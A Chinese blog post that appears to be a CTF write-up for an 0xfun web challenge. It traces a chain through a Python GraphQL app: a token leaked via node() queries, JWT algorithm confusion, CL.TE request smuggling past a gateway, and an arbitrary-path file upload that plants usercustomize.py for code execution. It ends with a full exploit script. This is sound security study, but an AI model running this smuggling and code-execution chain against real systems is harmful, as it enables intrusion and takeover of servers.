Mobile wallpaper 1Mobile wallpaper 2Mobile wallpaper 3Mobile wallpaper 4
1222 字
6 分钟
记一次随心审计(From 0xfun esay)
2026-02-17
统计加载中...

记一次随心审计(From 0xfun esay)#

今天是大年初一,不喜欢喧嚣,今天选择在这里审计了一天。不失收获吧

虽然错过了烟花

多审计真感觉能提升一些语言理解,在0xfun有一题白盒,我想这可以开个新档审计审计。

我在想,一切漏洞的先决都是以‘可访问’为最先前提,不管是解析差异或者条件竞争。即便过了一段时间,我依旧这么想。

可控也就是,任何能被外部请求影响的输入源

我选择从路由开始

其中在/departures路由下有js的fetch

@app.get("/departures")
def departures():
return _page("Departures", '''
<div class="card">
<h2>Live Departure Board</h2>
<table id="departures"><thead><tr>
<th>Flight</th><th>Destination</th><th>Gate</th><th>Scheduled</th><th>Status</th>
</tr></thead><tbody></tbody></table>
</div>
<script>
fetch("/graphql",{method:"POST",headers:{"Content-Type":"application/json"},
body:JSON.stringify({query:"{flights{flightNumber destination gate scheduled status}}"})})
.then(r=>r.json()).then(d=>{
if(!d.data||!d.data.flights)return;
let t=document.querySelector("#departures tbody");
d.data.flights.forEach(f=>{
let st=f.status.toLowerCase().replace(" ","");
t.innerHTML+=`<tr><td><strong>${f.flightNumber}</strong></td><td>${f.destination}</td>
<td>${f.gate}</td><td>${f.scheduled}</td>
<td><span class="badge badge-${st.replace("ontime","on-time")}">${f.status}</span></td></tr>`;
});
});
</script>''')

json块是{query:“{flights{flightNumber destination gate scheduled status}}

进行溯源。

graphql_router = strawberry.fastapi.GraphQLRouter(schema, graphql_ide=None)
app.include_router(graphql_router, prefix="/graphql")

继续查找schema定义

schema = strawberry.Schema(query=GQLQuery, types=[PassengerNode, StaffNode])

可以看到这里规定了query,继续查找

@strawberry.type
class GQLQuery:
node: Node = strawberry.relay.node()
@strawberry.field
def passengers(self) -> List[PassengerNode]:
return [u for u in USERS.values() if u.role == "passenger"]
@strawberry.field
def staff(self) -> List[StaffSummary]:
return [
StaffSummary(
username=u.username,
full_name=u.full_name,
badge_id=u.badge_id,
department=u.department,
)
for u in USERS.values() if u.role == "staff"
]
@strawberry.field
def flights(self) -> List[Flight]:
return [
Flight(
flight_number=f.flight_number,
destination=f.destination,
gate=f.gate,
scheduled=f.scheduled,
status=f.status,
)
for f in FLIGHTS
]

可以看到是一个类,提供了多种数据视图。我们默认请求的是def flights(self) -> List[Flight]:

但是query并没有做内网转发,而且还有node()接口暴露。

并且在type对象下还挂载了

@strawberry.type
class StaffNode(Node):
id: NodeID[int]
username: str
full_name: str
badge_id: Optional[str]
department: Optional[str]
access_token: Optional[str]
@classmethod
def resolve_node(cls, node_id: str, *, info: Info, **kwargs):
return USERS.get(int(node_id))
@classmethod
def resolve_nodes(cls, *, info: Info, node_ids, required=False):
return [USERS.get(int(nid)) for nid in node_ids]
@classmethod
def is_type_of(cls, obj, info: Info) -> bool:
return isinstance(obj, UserModel) and obj.role == "staff"

表明user可以被node查询到并且返回。而user2带有access_token=_STAFF_JWT

也就是公钥。并且在jwt校验时并没有严格校验alg,这样就能用HS/RS混淆

payload = jose_jwt.decode(token, RSA_PUBLIC_DER, algorithms=None)

改RSA解密为HS256对称加密就可以用已经泄露公钥进行伪造admin字段

但是网关还是进行了拦截,/internal/*的目录都做了过滤,看看传文件的源码

我们想到请求走私

这一步最关键的是端到端解析差异导致,观察相关源码

EXPOSE 9000,在dockerfile是监听9000端口

然后在strart.sh

exec su -s /bin/bash skyport -c "/app/venv/bin/python3 -m hypercorn /app/app:app --bind 127.0.0.1:5000 --workers 2 --worker-class asyncio --max-requests 100"

内部起服务,转发到5000端口,并且两个解析器不一样

同一条TCP没有经过其他处理,直接转发,尝试请求走私

原先我在burp发包时它重算了length,重载了chunk。所以失败了

来个请求走私可视化

[ Gateway thinks ]
POST /graphql finished
[ Backend thinks ]
POST /graphql finished
POST /internal/upload executed

这时就能让网关以为这是一个请求就能顺利进后端了

当然,这里的转发规则暂时不深入探讨,就当是自定义网关的信任危机吧

传入后后端会判断CT头解析为两个请求,也就进了upload

看看这段源码

def sanitize_filename(filename: str) -> str:
filename = os.path.basename(filename)
filename = "".join(c for c in filename if c.isalnum() or c in "._-")
filename = "".join(c for c in filename if ord(c) >= 32)
return filename if filename else "upload.bin"
async def save_uploaded_file(file: UploadFile) -> Path:
filename = file.filename or "upload.bin"
if filename.startswith("/"):
destination = Path(filename)
else:
safe_name = sanitize_filename(filename)
destination = UPLOAD_DIR / safe_name
content = await file.read()
destination.parent.mkdir(parents=True, exist_ok=True)
destination.write_bytes(content)
return destination
@app.post("/internal/upload")
async def upload_file(request: Request, file: UploadFile = File(...)):
if not _require_admin(request):
return JSONResponse({"error": "admin token required"}, status_code=401)
uploaded_path = await save_uploaded_file(file)
return JSONResponse({
"message": "uploaded successfully",
"path": str(uploaded_path)
})

这里如果/开头就直接创建path并且parent加mkdir落盘。

并且没有任何安全校验。但是我们怎么利用这点是个问题,我们并不能直接启动文件

再看这

exec su -s /bin/bash skyport -c "/app/venv/bin/python3 -m hypercorn /app/app:app --bind 127.0.0.1:5000 --workers 2 --worker-class asyncio --max-requests 100"

每个worker进程每启动100次就会重启,重启的python模块会自动载入 site模块

site模块会尝试import sitecustomize / usercustomize

所以如果写成 usercustomize.py 并且放在 /home/skyport/.local/lib/python3.11/site-packages/usercustomize.py 类似目录就会执行

,然后提供了readflag的suid程序。

直接提权拿到flag。

构建exp

#!/usr/bin/env python3
import socket, time, requests
HOST = "chall.0xfun.org"
PORT = 42507
ADMIN = "ADMIN_TOKEN"
# -------- helpers --------
def recv_until(sock, marker=b"\r\n\r\n"):
data=b""
while marker not in data:
chunk=sock.recv(4096)
if not chunk: break
data+=chunk
return data
def send_request(sock, req):
sock.sendall(req)
return recv_until(sock)
# -------- build malicious python --------
payload = b"""
import subprocess, pathlib
pathlib.Path('/tmp/skyport_uploads/flag.txt').write_bytes(subprocess.check_output(['/flag']))
"""
boundary="----sky"
body = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="file"; filename="/home/skyport/.local/lib/python3.11/site-packages/usercustomize.py"\r\n'
f"Content-Type: application/octet-stream\r\n\r\n"
).encode() + payload + f"\r\n--{boundary}--\r\n".encode()
upload_req = (
f"POST /internal/upload HTTP/1.1\r\n"
f"Host: {HOST}\r\n"
f"Authorization: Bearer {ADMIN}\r\n"
f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
f"Content-Length: {len(body)}\r\n"
f"Connection: keep-alive\r\n"
f"\r\n"
).encode() + body
# CL.TE smuggle
front_body = b"0\r\n\r\n" + upload_req
front_req = (
f"POST /graphql HTTP/1.1\r\n"
f"Host: {HOST}\r\n"
f"Content-Type: application/json\r\n"
f"Content-Length: {len(front_body)}\r\n"
f"Transfer-Encoding: chunked\r\n"
f"Connection: keep-alive\r\n"
f"\r\n"
).encode() + front_body
# -------- exploit --------
print("[*] connecting")
sock = socket.create_connection((HOST,PORT))
print("[*] sending smuggled upload")
send_request(sock, front_req)
print("[*] poisoning queue")
resp = send_request(sock, f"GET / HTTP/1.1\r\nHost: {HOST}\r\nConnection: keep-alive\r\n\r\n".encode())
if b"uploaded successfully" not in resp:
print("[-] upload may have failed")
else:
print("[+] upload confirmed")
sock.close()
# restart workers
print("[*] restarting workers")
for _ in range(180):
try: requests.get(f"http://{HOST}:{PORT}/",timeout=0.3)
except: pass
# fetch flag
print("[*] waiting for flag")
for _ in range(30):
r=requests.get(f"http://{HOST}:{PORT}/uploads/flag.txt")
if r.status_code==200 and "0xfun{" in r.text:
print("\nFLAG:",r.text.strip())
break
time.sleep(0.5)
记一次随心审计(From 0xfun esay)
https://steins-gate.cn/posts/skyport/
作者
萦梦sora~X
发布于
2026-02-17
许可协议
Unlicensed

部分信息可能已经过时